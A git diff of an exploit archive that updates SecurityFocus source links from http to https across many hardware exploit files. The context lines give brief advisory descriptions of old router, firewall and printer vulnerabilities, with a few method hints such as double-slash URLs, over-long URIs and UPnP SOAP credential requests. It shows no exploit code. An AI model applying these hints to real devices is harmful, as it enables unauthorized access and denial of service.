diff --git a/exploits/hardware/remote/19901.txt b/exploits/hardware/remote/19901.txt index b1b9465de..3ce4d14ea 100644 --- a/exploits/hardware/remote/19901.txt +++ b/exploits/hardware/remote/19901.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1177/info +source: https://www.securityfocus.com/bid/1177/info All R-series platforms with firmware between 4.3.8 and 4.6.2 (inclusive) allow users who already have access to the router to modify SNMP tables which they should not be able to access. The router has a command-line mode that is reached by typing control-N after the user has passed the intial login test. At the "#" prompt one can then do most management of the device. This includes the setting of SNMP community strings in spite of the limitation imposed by the administrator. diff --git a/exploits/hardware/remote/19943.txt b/exploits/hardware/remote/19943.txt index 43d7f1053..018db14ef 100644 --- a/exploits/hardware/remote/19943.txt +++ b/exploits/hardware/remote/19943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1228/info +source: https://www.securityfocus.com/bid/1228/info The Intel Express 8100 and possibly 8200 ISDN routers can be remotely crashed by sending fragmented or oversized ICMP packets. diff --git a/exploits/hardware/remote/20067.c b/exploits/hardware/remote/20067.c index 9f5581025..dabe7b3d1 100644 --- a/exploits/hardware/remote/20067.c +++ b/exploits/hardware/remote/20067.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1454/info +// source: https://www.securityfocus.com/bid/1454/info A connection through a Cisco Secure PIX Firewall can be reset by a third party if the source and destination IP addresses and ports of the connection can be determined or inferred. This can be accomplished by sending a forged TCP Reset (RST) packet to the firewall, containing the same source and destination addresses and ports (in the TCP packet header) as the connection to be disrupted. The attacker would have to possess detailed knowledge of the connection table in the firewall (which is used to track outgoing connections and disallow any connections from the external network that were not initiated by an internal machine) or be able to otherwise determine the required IP address and port information to exploit this. diff --git a/exploits/hardware/remote/20231.txt b/exploits/hardware/remote/20231.txt index 887ff684d..4527d221b 100644 --- a/exploits/hardware/remote/20231.txt +++ b/exploits/hardware/remote/20231.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1698/info +source: https://www.securityfocus.com/bid/1698/info Like other firewalls, the Cisco PIX Firewall implements technology that reads the contents of packets passing through it for application-level filtering. In the case of SMTP, it can be configured so only certain smtp commands can be allowed through (for example, dropping extra functionality, such as HELP or commands that could be a security concern, like EXPN or VRFY). When recieving messages, it allows all text through between "data" and ".", as this is where the body of the message would normally go and there could be words in it that are smtp commands which shouldn't be filtered. Due to the nature of SMTP and flaws in exceptional condition handling of PIX, it is reportedly possible to evade the smtp command restrictions by tricking the firewall into thinking the body of the message is being sent when it isn't. 
diff --git a/exploits/hardware/remote/20330.pl b/exploits/hardware/remote/20330.pl index bbab083d0..65e457886 100755 --- a/exploits/hardware/remote/20330.pl +++ b/exploits/hardware/remote/20330.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1846/info +source: https://www.securityfocus.com/bid/1846/info A vulnerability exists in the webserver configuration interface which will allow an anonymous user to execute commands. A http request which includes /exec and a known filename will reveal the contents of the particular file. In addition to disclosing the contents of files, this vulnerability could allow a user to execute arbitrary code. diff --git a/exploits/hardware/remote/20369.sh b/exploits/hardware/remote/20369.sh index 526a3b882..134a07b55 100755 --- a/exploits/hardware/remote/20369.sh +++ b/exploits/hardware/remote/20369.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1877/info +source: https://www.securityfocus.com/bid/1877/info The Cisco PIX is a popular firewall network device. diff --git a/exploits/hardware/remote/20372.pl b/exploits/hardware/remote/20372.pl index 2c9f09e99..8c3aeac3e 100755 --- a/exploits/hardware/remote/20372.pl +++ b/exploits/hardware/remote/20372.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1885/info +source: https://www.securityfocus.com/bid/1885/info A vulnerability exists in the Cisco Virtual Central Office 4000 (VCO/4K) programmable voice switch running software versions 5.13 and earlier. diff --git a/exploits/hardware/remote/20565.c b/exploits/hardware/remote/20565.c index 40697da36..9d418f930 100644 --- a/exploits/hardware/remote/20565.c +++ b/exploits/hardware/remote/20565.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2245/info +source: https://www.securityfocus.com/bid/2245/info Certain versions of HP JetDirect enabled printers provide a function (PJL command) that changes the LCD display on a printer over TCP/IP. Arbitrary strings can be sent to the LCD display by a remote user using this command. This represents more of a nuisance than a threat, although it is conceivable that the ability to modify the display could be used in some sort of "social engineering" scheme. */ diff --git a/exploits/hardware/remote/20652.txt b/exploits/hardware/remote/20652.txt index c2fff14d9..590f4d2cc 100644 --- a/exploits/hardware/remote/20652.txt +++ b/exploits/hardware/remote/20652.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2427/info +source: https://www.securityfocus.com/bid/2427/info IOS is the operating system designed for various Cisco devices. It is maintained and distributed by Cisco systems. diff --git a/exploits/hardware/remote/20806.txt b/exploits/hardware/remote/20806.txt index e9f017e5e..e9cea554a 100644 --- a/exploits/hardware/remote/20806.txt +++ b/exploits/hardware/remote/20806.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2659/info +source: https://www.securityfocus.com/bid/2659/info A remote vulnerability exists in Tektronix Phaser network printers in the 7xx, 8xx, and 9xx series. diff --git a/exploits/hardware/remote/20892.txt b/exploits/hardware/remote/20892.txt index b007721b9..8c11a3292 100644 --- a/exploits/hardware/remote/20892.txt +++ b/exploits/hardware/remote/20892.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2802/info +source: https://www.securityfocus.com/bid/2802/info Olicom routers were previously manufactured and distributed by Olicom, a company now owned by Intel. Olicom routers provide a low-cost routing solution for small businesses. diff --git a/exploits/hardware/remote/20975.pl b/exploits/hardware/remote/20975.pl index 6fadee885..79cd0d50e 100755 
--- a/exploits/hardware/remote/20975.pl +++ b/exploits/hardware/remote/20975.pl @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/2936/info +# source: https://www.securityfocus.com/bid/2936/info # # IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. # diff --git a/exploits/hardware/remote/20976.c b/exploits/hardware/remote/20976.c index 1bedce00d..db206448e 100644 --- a/exploits/hardware/remote/20976.c +++ b/exploits/hardware/remote/20976.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/2936/info +source: https://www.securityfocus.com/bid/2936/info IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. diff --git a/exploits/hardware/remote/20977.pl b/exploits/hardware/remote/20977.pl index ce2a7b2fa..9e8548118 100755 --- a/exploits/hardware/remote/20977.pl +++ b/exploits/hardware/remote/20977.pl @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/2936/info +# source: https://www.securityfocus.com/bid/2936/info # # IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. # diff --git a/exploits/hardware/remote/20978.pl b/exploits/hardware/remote/20978.pl index b0a661a57..095b697ba 100755 --- a/exploits/hardware/remote/20978.pl +++ b/exploits/hardware/remote/20978.pl @@ -1,4 +1,4 @@ -# source: http://www.securityfocus.com/bid/2936/info +# source: https://www.securityfocus.com/bid/2936/info # # IOS is router firmware developed and distributed by Cisco Systems. IOS functions on numerous Cisco devices, including routers and switches. # diff --git a/exploits/hardware/remote/21011.pl b/exploits/hardware/remote/21011.pl index 0864a0a12..05f0f4556 100755 --- a/exploits/hardware/remote/21011.pl +++ b/exploits/hardware/remote/21011.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3034/info +source: https://www.securityfocus.com/bid/3034/info A vulnerability exists in certain models of 3Com hubs and potentially other 3Com network products. diff --git a/exploits/hardware/remote/21015.pl b/exploits/hardware/remote/21015.pl index 52aefe7e6..6c052daec 100755 --- a/exploits/hardware/remote/21015.pl +++ b/exploits/hardware/remote/21015.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3058/info +source: https://www.securityfocus.com/bid/3058/info SecureRemote is the proprietary VPN infrastructure designed by Check Point Software, and included with some versions of Firewall-1. diff --git a/exploits/hardware/remote/21186.txt b/exploits/hardware/remote/21186.txt index feef3a6fb..c342e1791 100644 --- a/exploits/hardware/remote/21186.txt +++ b/exploits/hardware/remote/21186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3711/info +source: https://www.securityfocus.com/bid/3711/info Prestige is a product line of DSL routers produced and distributed by Zyxel. diff --git a/exploits/hardware/remote/21243.pl b/exploits/hardware/remote/21243.pl index bdfb9842d..c364177c8 100755 --- a/exploits/hardware/remote/21243.pl +++ b/exploits/hardware/remote/21243.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3964/info +source: https://www.securityfocus.com/bid/3964/info Alteon ACEdirector is a hardware solution distributed by Nortel Networks. ACEdirector runs the Nortel WebOS operating system. diff --git a/exploits/hardware/remote/21285.txt b/exploits/hardware/remote/21285.txt index 9f6ceebba..5fae81745 100644 --- a/exploits/hardware/remote/21285.txt +++ b/exploits/hardware/remote/21285.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4062/info +source: https://www.securityfocus.com/bid/4062/info HP AdvanceStack 10Base-T Switching Hubs combine 10Base-T functionality with the performance of switching. 
diff --git a/exploits/hardware/remote/21378.txt b/exploits/hardware/remote/21378.txt index 5a5547689..bec7c1e1c 100644 --- a/exploits/hardware/remote/21378.txt +++ b/exploits/hardware/remote/21378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4507/info +source: https://www.securityfocus.com/bid/4507/info Nortel CVX 1800 Multi-Service Access Switch is a hardware modem bank. diff --git a/exploits/hardware/remote/21441.txt b/exploits/hardware/remote/21441.txt index f0a0b3e9b..1bdfce256 100644 --- a/exploits/hardware/remote/21441.txt +++ b/exploits/hardware/remote/21441.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4711/info +source: https://www.securityfocus.com/bid/4711/info The Cisco ATA-186 Analog Telephone Adapter is a hardware device designed to interface between analog telephones and Voice over IP (VoIP). It includes support for web based configuration. diff --git a/exploits/hardware/remote/21456.txt b/exploits/hardware/remote/21456.txt index e2d7e56c1..9e5e9c21e 100644 --- a/exploits/hardware/remote/21456.txt +++ b/exploits/hardware/remote/21456.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4760/info +source: https://www.securityfocus.com/bid/4760/info IDS Device Manager is a web interface to the Cisco IDS systems. It is distributed and maintained by Cisco Systems. diff --git a/exploits/hardware/remote/21513.c b/exploits/hardware/remote/21513.c index 01c36bbda..d9c01b52b 100644 --- a/exploits/hardware/remote/21513.c +++ b/exploits/hardware/remote/21513.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4946/info +// source: https://www.securityfocus.com/bid/4946/info The 1100 series routers are a broadband connectivity solution distributed by Telindus. diff --git a/exploits/hardware/remote/21699.txt b/exploits/hardware/remote/21699.txt index b4ede832c..b652aa0fe 100644 --- a/exploits/hardware/remote/21699.txt +++ b/exploits/hardware/remote/21699.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5436/info +source: https://www.securityfocus.com/bid/5436/info Orinoco is the manufacturer of various wireless network components, including access points and network cards. diff --git a/exploits/hardware/remote/21827.txt b/exploits/hardware/remote/21827.txt index eec9e939f..49f2b1327 100644 --- a/exploits/hardware/remote/21827.txt +++ b/exploits/hardware/remote/21827.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5780/info +source: https://www.securityfocus.com/bid/5780/info It has been reported that the Compaq Insight Manager web interface is prone to cross-site scripting attacks. It is possible to construct a malicious link to a Compaq Insight Manager web interface that includes arbitrary script code. When the link is visited with a web client, the script code will execute in the context of the Compaq Insight Manager web interface. diff --git a/exploits/hardware/remote/21944.pl b/exploits/hardware/remote/21944.pl index 04bfe1390..fc0edf45d 100755 --- a/exploits/hardware/remote/21944.pl +++ b/exploits/hardware/remote/21944.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5976/info +source: https://www.securityfocus.com/bid/5976/info Certain versions of Cisco CatOS ship with an embedded HTTP server. Switches that run these versions of CatOS are prone to a denial of service, which is due to a remote buffer overflow condition in the HTTP server. diff --git a/exploits/hardware/remote/21983.c b/exploits/hardware/remote/21983.c index 7a58f25f9..a2a8abc26 100644 --- a/exploits/hardware/remote/21983.c +++ b/exploits/hardware/remote/21983.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6100/info +// source: https://www.securityfocus.com/bid/6100/info An information disclosure vulnerability has been discovered in GlobalSunTech access points. diff --git a/exploits/hardware/remote/22236.txt b/exploits/hardware/remote/22236.txt index b16bcff9e..2362ada34 100644 
--- a/exploits/hardware/remote/22236.txt +++ b/exploits/hardware/remote/22236.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6807/info +source: https://www.securityfocus.com/bid/6807/info Netgear FM114P Wireless Firewalls allow directory traversal using escaped character sequences. It is possible for an unauthenticated user to retrieve the firewall's configuration file by escaping from the /upnp/service directory. diff --git a/exploits/hardware/remote/22244.txt b/exploits/hardware/remote/22244.txt index cda7337e5..0f0a37a17 100644 --- a/exploits/hardware/remote/22244.txt +++ b/exploits/hardware/remote/22244.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6824/info +source: https://www.securityfocus.com/bid/6824/info The Ericsson HM220dp DSL Modem uses a web interface for remote administration and configuration. This interface does not require any authentication in order to access. There is no option to enable any authentication requirement. diff --git a/exploits/hardware/remote/22271.c b/exploits/hardware/remote/22271.c index 86d92e103..c8da64283 100644 --- a/exploits/hardware/remote/22271.c +++ b/exploits/hardware/remote/22271.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/6895/info +// source: https://www.securityfocus.com/bid/6895/info Cisco IOS is prone to a remotely exploitable buffer overflow condition when handling malformed OSPF (Open Shortest Path First) packets. The overflow occurs when more than 255 OSPF neighbors are announced. This may make it possible to execute malicious instructions on a device running a vulnerable version of the software. Denial of service is also possible. diff --git a/exploits/hardware/remote/22319.txt b/exploits/hardware/remote/22319.txt index e9af3b4ea..87daf7fc1 100644 --- a/exploits/hardware/remote/22319.txt +++ b/exploits/hardware/remote/22319.txt 
@@ -1,6 +1,6 @@ HP JetDirect J2552A/J2552B/J2591A/J3110A/J3111A/J3113A/J3263A/300.0 X Printer SNMP JetAdmin Device Password Disclosure Vulnerability -source: http://www.securityfocus.com/bid/7001/info +source: https://www.securityfocus.com/bid/7001/info A problem with JetDirect printers could make it possible for a remote user to gain administrative access to the printer. diff --git a/exploits/hardware/remote/22350.txt b/exploits/hardware/remote/22350.txt index bcafba77c..ec5eba190 100644 --- a/exploits/hardware/remote/22350.txt +++ b/exploits/hardware/remote/22350.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7081/info +source: https://www.securityfocus.com/bid/7081/info It has been reported that some models of the SGSN made by Nokia do not properly handle remote requests for information. Vulnerable devices may disclose sensitive information which could enable an attacker may be able to mount further attacks on network resources. diff --git a/exploits/hardware/remote/22394.txt b/exploits/hardware/remote/22394.txt index 696bc6cac..7531f3caa 100644 --- a/exploits/hardware/remote/22394.txt +++ b/exploits/hardware/remote/22394.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7161/info +source: https://www.securityfocus.com/bid/7161/info An issue has been discovered in Check Point FW-1 syslog daemon when attempting to process a malicious, remotely supplied, syslog message. Specifically, some messages containing escape sequences are not properly filtered out. This may result in unpredictable behaviour by the Check Point syslog daemon. diff --git a/exploits/hardware/remote/22416.txt b/exploits/hardware/remote/22416.txt index 8dd8dbae4..644b29ffe 100644 --- a/exploits/hardware/remote/22416.txt +++ b/exploits/hardware/remote/22416.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7176/info +source: https://www.securityfocus.com/bid/7176/info A vulnerability has been reported in 3Com RAS 1500 router that may allow attackers to access sensitive data. Specifically, RAS 1500 devices fail to carry out authentication when requests are made for various files that may contain sensitive information. diff --git a/exploits/hardware/remote/22453.txt b/exploits/hardware/remote/22453.txt index 8ffe4f40f..fd9f9acf9 100644 --- a/exploits/hardware/remote/22453.txt +++ b/exploits/hardware/remote/22453.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7267/info +source: https://www.securityfocus.com/bid/7267/info The Netgear FM114P ProSafe Wireless Router is vulnerable to information disclosure. If Remote Access and Universal Plug and Play are both enabled on the WAN interface, a UPnP SOAP request can retrieve the username and password for the WAN interface. diff --git a/exploits/hardware/remote/22455.txt b/exploits/hardware/remote/22455.txt index deaf42e1b..4d482a32e 100644 --- a/exploits/hardware/remote/22455.txt +++ b/exploits/hardware/remote/22455.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7270/info +source: https://www.securityfocus.com/bid/7270/info The Netgear FM114P allows certain ports to be blocked, both for external users attempting to enter the local network and for local users connecting to the WAN. If Remote Access and Universal Plug and Play are both enabled on the WAN interface, a UPnP SOAP request can cause a connection to be intitiated through a port that is normally blocked. diff --git a/exploits/hardware/remote/22480.txt b/exploits/hardware/remote/22480.txt index 1a9126102..4dbacf348 100644 --- a/exploits/hardware/remote/22480.txt +++ b/exploits/hardware/remote/22480.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7317/info +source: https://www.securityfocus.com/bid/7317/info Linksys BEFVP4 VPN router has been reported prone to a sensitive information disclosure vulnerability. diff --git a/exploits/hardware/remote/22532.txt b/exploits/hardware/remote/22532.txt index 1746fcaa6..035defe55 100644 --- a/exploits/hardware/remote/22532.txt +++ b/exploits/hardware/remote/22532.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7423/info +source: https://www.securityfocus.com/bid/7423/info When a VPN is configured to use a pre-shared master secret and a client attempts to negotiate keys in aggressive mode, a hash of the secret is transmitted across the network in clear-text. This may result in the hash being leaked to eavesdroppers or malicious clients. An offline brute-force attack on this hash may then be performed to obtain the clear-text secret. diff --git a/exploits/hardware/remote/22533.txt b/exploits/hardware/remote/22533.txt index a9abbb4c7..109d6a24b 100644 --- a/exploits/hardware/remote/22533.txt +++ b/exploits/hardware/remote/22533.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7426/info +source: https://www.securityfocus.com/bid/7426/info It has been reported that Nokia IPSO does not properly handle some types of requests through Voyager. Because of this, an attacker with access to the interface may be able to view potentially sensitive information. diff --git a/exploits/hardware/remote/22626.txt b/exploits/hardware/remote/22626.txt index 686c5fac0..fb12d85e6 100644 --- a/exploits/hardware/remote/22626.txt +++ b/exploits/hardware/remote/22626.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7652/info +source: https://www.securityfocus.com/bid/7652/info A vulnerability has been discovered in various Axis Communications products. By making a request for a specially formatted URL, it may be possible for remote users to access the administrative configuration interface without being prompted for authentication. diff --git a/exploits/hardware/remote/22898.txt b/exploits/hardware/remote/22898.txt index 4a4c1b267..4a825fff2 100644 --- a/exploits/hardware/remote/22898.txt +++ b/exploits/hardware/remote/22898.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8183/info +source: https://www.securityfocus.com/bid/8183/info It has been reported that remote users may be able to obtain sensitive information from Asus ADSL routers. It is possible to request files from the built-in Web server that contain information such as usernames, passwords and other configuration information. diff --git a/exploits/hardware/remote/23212.txt b/exploits/hardware/remote/23212.txt index 23369c213..33f35a8f5 100644 --- a/exploits/hardware/remote/23212.txt +++ b/exploits/hardware/remote/23212.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8755/info +source: https://www.securityfocus.com/bid/8755/info It has been reported that Cisco LEAP (Lightweight Extensible Authentication Protocol) is prone to a password disclosure weakness that may allow a remote user to steal user passwords. The issue may be exploited out by brute forcing user passwords using dictionary attacks. diff --git a/exploits/hardware/remote/23317.txt b/exploits/hardware/remote/23317.txt index a0df9c59d..cd17928af 100644 --- a/exploits/hardware/remote/23317.txt +++ b/exploits/hardware/remote/23317.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8942/info +source: https://www.securityfocus.com/bid/8942/info It has been reported that FlexWATCH Network Video Server may be prone to an access validation error that may allow a remote attacker to gain administrative access to the system. The problem is reported to present itself when an attacker attempts to access the administrative interface using a specially crafted URL containing two slash '/' characters. diff --git a/exploits/hardware/remote/23376.txt b/exploits/hardware/remote/23376.txt index 8e2b3f39e..c979edcb8 100644 --- a/exploits/hardware/remote/23376.txt +++ b/exploits/hardware/remote/23376.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9033/info +source: https://www.securityfocus.com/bid/9033/info Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface. diff --git a/exploits/hardware/remote/23377.txt b/exploits/hardware/remote/23377.txt index 2c04eb967..fdbdcba16 100644 --- a/exploits/hardware/remote/23377.txt +++ b/exploits/hardware/remote/23377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9033/info +source: https://www.securityfocus.com/bid/9033/info Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface. diff --git a/exploits/hardware/remote/23378.txt b/exploits/hardware/remote/23378.txt index 721034655..c2bb7e307 100644 --- a/exploits/hardware/remote/23378.txt +++ b/exploits/hardware/remote/23378.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9033/info +source: https://www.securityfocus.com/bid/9033/info Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface. diff --git a/exploits/hardware/remote/23379.txt b/exploits/hardware/remote/23379.txt index 3cd7ea104..58c5ab8cd 100644 --- a/exploits/hardware/remote/23379.txt 
+++ b/exploits/hardware/remote/23379.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9033/info +source: https://www.securityfocus.com/bid/9033/info Multiple cross-site scripting vulnerabilities have been reported in the FortiGate Firewall web administrative interface. diff --git a/exploits/hardware/remote/23527.txt b/exploits/hardware/remote/23527.txt index 7bdd94ba4..a6f4dcaf0 100644 --- a/exploits/hardware/remote/23527.txt +++ b/exploits/hardware/remote/23527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9373/info +source: https://www.securityfocus.com/bid/9373/info ZyWALL 10 firewalls are prone to cross-site scripting attacks via the web management interface of affected devices. An attacker could exploit this issue by enticing a victim user to follow a malicious link to a site hosting the software that contains embedded HTML and script code. The embedded code may be rendered in the web browser of the victim user. diff --git a/exploits/hardware/remote/23528.txt b/exploits/hardware/remote/23528.txt index be3277287..91d76d745 100644 --- a/exploits/hardware/remote/23528.txt +++ b/exploits/hardware/remote/23528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9374/info +source: https://www.securityfocus.com/bid/9374/info Edimax AR-6004 ADSL Routers are prone to cross-site scripting attacks via the web management interface of affected devices. An attacker could exploit this issue by enticing a victim user to follow a malicious link to a site hosting the software that contains embedded HTML and script code. The embedded code may be rendered in the web browser of the victim user. diff --git a/exploits/hardware/remote/23545.txt b/exploits/hardware/remote/23545.txt index c0c1bf706..4e6393180 100644 --- a/exploits/hardware/remote/23545.txt +++ b/exploits/hardware/remote/23545.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9431/info +source: https://www.securityfocus.com/bid/9431/info The e-GAP appliance has been reported prone to a source code disclosure vulnerability. It has been reported that, when the affected appliance handles unexpected HTTP requests it may divulge the source code of the login script. The login page is used to build a simple form for collecting and submitting the username and the password to the e-Gap server. The authentication logic is not part of this page and cannot be viewed by the attacker. The information contained in the login page is not typically sensitive. diff --git a/exploits/hardware/remote/23721.txt b/exploits/hardware/remote/23721.txt index bdd2ac3e5..f261bec69 100644 --- a/exploits/hardware/remote/23721.txt +++ b/exploits/hardware/remote/23721.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9688/info +source: https://www.securityfocus.com/bid/9688/info Linksys WAP55AG appliance has been reported prone to an insecure default configuration vulnerability. diff --git a/exploits/hardware/remote/23764.txt b/exploits/hardware/remote/23764.txt index 2d5135904..ef86661d4 100644 --- a/exploits/hardware/remote/23764.txt +++ b/exploits/hardware/remote/23764.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9755/info +source: https://www.securityfocus.com/bid/9755/info A vulnerability has been reported to exist in the Symantec Gateway Security Web based management console that may allow a remote user to launch cross-site scripting attacks. diff --git a/exploits/hardware/remote/23808.txt b/exploits/hardware/remote/23808.txt index 58fae41c9..0b84fecde 100644 --- a/exploits/hardware/remote/23808.txt +++ b/exploits/hardware/remote/23808.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9858/info +source: https://www.securityfocus.com/bid/9858/info The IP3 NetAccess Appliance is reported prone to a remote SQL-injection vulnerability. This issue is due to the application's failure to properly sanitize user input. diff --git a/exploits/hardware/remote/24065.java b/exploits/hardware/remote/24065.java index 4c17a0151..d2b44be36 100644 --- a/exploits/hardware/remote/24065.java +++ b/exploits/hardware/remote/24065.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10227/info +source: https://www.securityfocus.com/bid/10227/info Reportedly the Siemens S55 is affected by an SMS confirmation message bypass vulnerability. This issue is due to a race condition error that allows a malicious programmer to send SMS messages from unsuspecting cellular telephone user's telephones while obscuring the confirmation request. diff --git a/exploits/hardware/remote/24115.c b/exploits/hardware/remote/24115.c index 6c05491c7..e50d89ebb 100644 --- a/exploits/hardware/remote/24115.c +++ b/exploits/hardware/remote/24115.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10329/info +// source: https://www.securityfocus.com/bid/10329/info It has been reported that the built-in DHCP server on these devices are prone to an information disclosure vulnerability. When attempting to exploit this issue, it has been reported that a denial of service condition may occur, stopping legitimate users from using the device. diff --git a/exploits/hardware/remote/24140.txt b/exploits/hardware/remote/24140.txt index 1b9d1da63..4858e935e 100644 --- a/exploits/hardware/remote/24140.txt +++ b/exploits/hardware/remote/24140.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10404/info +source: https://www.securityfocus.com/bid/10404/info It is reported that users may bypass Netgear RP114 content filter functionality. This can be accomplished by making a URI request string that is over 220 bytes in length. 
diff --git a/exploits/hardware/remote/24226.txt b/exploits/hardware/remote/24226.txt index b02c638ed..78a6e8da6 100644 --- a/exploits/hardware/remote/24226.txt +++ b/exploits/hardware/remote/24226.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10587/info +source: https://www.securityfocus.com/bid/10587/info It is reported that the DI-614+, DI-704, and the DI-624 are susceptible to an HTML injection vulnerability in their DHCP log. diff --git a/exploits/hardware/remote/24230.txt b/exploits/hardware/remote/24230.txt index 4f68dc66f..39a5c02c4 100644 --- a/exploits/hardware/remote/24230.txt +++ b/exploits/hardware/remote/24230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10589/info +source: https://www.securityfocus.com/bid/10589/info BT Voyager 2000 Wireless ADSL Router is reported prone to a sensitive information disclosure vulnerability. diff --git a/exploits/hardware/remote/24681.txt b/exploits/hardware/remote/24681.txt index c4a10ecbc..5822aa9c1 100644 --- a/exploits/hardware/remote/24681.txt +++ b/exploits/hardware/remote/24681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11408/info +source: https://www.securityfocus.com/bid/11408/info 3Com 3CRADSL72 is reported prone to an information disclosure, and an authentication bypass vulnerability. This issue can allow a remote attacker to disclose sensitive information such as the router name, primary and secondary DNS servers, default gateway. Attackers could also reportedly gain administrative access to the router. diff --git a/exploits/hardware/remote/24760.txt b/exploits/hardware/remote/24760.txt index 51ebdccf7..fac3d5c90 100644 --- a/exploits/hardware/remote/24760.txt +++ b/exploits/hardware/remote/24760.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11723/info +source: https://www.securityfocus.com/bid/11723/info ZyXEL Prestige router series is reported prone to an access validation vulnerability. The vulnerability exists because the firmware of the router fails to restrict access to a configuration page that is a part of the ZyXEL Prestige HTTP based remote administration service. diff --git a/exploits/hardware/remote/25359.txt b/exploits/hardware/remote/25359.txt index 89d8a872c..d69231508 100644 --- a/exploits/hardware/remote/25359.txt +++ b/exploits/hardware/remote/25359.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13051/info +source: https://www.securityfocus.com/bid/13051/info A remote authentication bypass vulnerability affects Linksys WET11. This issue is due to a failure of the application to validate authentication credentials when processing password change requests. diff --git a/exploits/hardware/remote/25684.html b/exploits/hardware/remote/25684.html index b56f92552..619064c9e 100644 --- a/exploits/hardware/remote/25684.html +++ b/exploits/hardware/remote/25684.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/13679/info +source: https://www.securityfocus.com/bid/13679/info Various D-Link DSL routers are susceptible to a remote authentication bypass vulnerability. This issue is due to a failure of the devices to require authentication in certain circumstances. diff --git a/exploits/hardware/remote/25949.pl b/exploits/hardware/remote/25949.pl index 2c9e1bac5..06c1fcd88 100755 --- a/exploits/hardware/remote/25949.pl +++ b/exploits/hardware/remote/25949.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14174/info +source: https://www.securityfocus.com/bid/14174/info Multiple Vendor VoIP Phones handle spoofed SIP status messages in an improper manner. This issue could potentially lead a to a denial of service condition against a server. 
